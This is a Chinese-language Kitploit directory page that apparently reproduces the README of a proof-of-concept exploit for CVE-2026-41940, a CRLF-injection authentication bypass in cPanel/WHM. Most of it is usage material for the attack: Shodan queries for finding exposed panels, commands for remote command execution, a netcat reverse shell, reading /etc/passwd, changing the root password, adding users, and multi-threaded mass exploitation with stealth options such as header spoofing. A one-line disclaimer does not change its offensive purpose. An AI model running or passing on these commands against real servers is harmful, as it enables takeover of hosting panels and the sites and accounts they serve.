Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 cPanel/WHM 认证绕过利用 - 最佳流程 💥 CRLF 注入导致认证绕过、会话劫持与账户泄露。✅ 支持代理、自定义 UA、保持连接、重试、SSL 验证、彩色输出及文件保存。⚡ 面向渗透测试人员的高级 PoC。 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
身份验证与授权权限提升漏洞分析漏洞利用Web应用程序漏洞利用信息收集后渗透利用渗透测试命令与控制

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
红队
Payload 开发
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

🚀 CVE-2026-41940 cPanel/WHM 认证绕过利用 - 最佳流程 💥 CRLF 注入导致认证绕过、会话劫持与账户泄露。✅ 支持代理、自定义 UA、保持连接、重试、SSL 验证、彩色输出及文件保存。⚡ 面向渗透测试人员的高级 PoC。

查看仓库
9281个月前尚未审核

CVE-2026-41940

🚀 CVE-2026-41940 - cPanel/WHM 身份验证绕过漏洞利用程序

Python License CVSS Pentesting

cPanel 与 WHM 版本 - CRLF 注入实现身份验证绕过与完全会话劫持

📌 概述

此漏洞利用程序利用 CVE-2026-41940,这是 cPanel/WHM 中的一个严重身份验证绕过漏洞。通过向会话管理系统注入精心构造的 CRLF 负载,它无需任何有效凭据即可实现会话劫持、获取 root 权限,并完全控制托管面板。

🔥 核心功能

类别功能
漏洞利用✅ 通过 CRLF 注入绕过身份验证
✅ WHM 会话劫持
✅ 安全令牌泄露
✅ 即时获取 Root 权限
后渗透✅ 提取账户列表(用户名 + 域名)
✅ 远程命令执行(RCE)
✅ 反向 Shell(兼容 netcat)
✅ 文件读取(配置、日志等)
✅ 修改 Root 密码
✅ 创建新的 cPanel 用户
扫描✅ 单目标漏洞利用
✅ 多目标批量扫描
✅ 多线程(可配置线程数)
✅ 端口覆盖支持
隐蔽性✅ 请求间随机延迟
✅ X-Forwarded-For 伪造
✅ 自定义 User-Agent 支持
✅ 代理支持(HTTP/HTTPS)
易用性✅ 交互式 WHM Shell(-i)
✅ 彩色输出(colorama)
✅ 详细/调试模式
✅ 账户列表导出到文件
✅ 保持会话存活的线程
✅ 不稳定连接的重试机制

🎯 受影响版本

产品

📍 Shodan 搜索

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ 免责声明:此工具仅用于授权安全测试和教育目的。未经授权的访问属于违法行为。

📦 安装

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ 使用示例

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 交互式 Shell 命令

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## 🔧 远程命令执行

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 反向 Shell

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 后渗透操作

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 批量漏洞利用(多目标)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ 高级选项

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 命令行参数

🧪 测试环境

Docker(如果你想安全测试)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

或者使用易受攻击的版本

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 相关漏洞利用程序

查看我的其他漏洞利用仓库:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
下载工具
版本
状态
cPanel & WHM11.92 - 11.102✅ 已确认
cPanel & WHM11.104 - 11.110✅ 已确认
cPanel & WHM11.118 - 11.136⚠️ 有限
cPanel & WHM< 11.86✅ 可能受影响
短参数长参数描述默认值
-t--target单个目标 URL必需(单目标)
-l--target-file包含目标列表的文件必需(批量)
-p--port覆盖端口自动检测
-o--output将账户列表保存到文件无
-v--verbose启用调试输出否
-i--interactive交互式 WHM Shell否
--proxyHTTP/HTTPS 代理无
-ua--user-agent自定义 User-Agent随机
--cmd执行单条命令无
--reverse-shell反向 Shell IP:端口无
--passwd修改 root 密码无
--adduser创建新用户(用户 域名 密码)无
--read从目标读取文件无
--threads批量扫描线程数10
--delay保持连接间隔(秒)3.0
--max-retries每个请求最大重试次数3
--no-keep-alive不保持会话否
--ssl-verify验证 SSL 证书否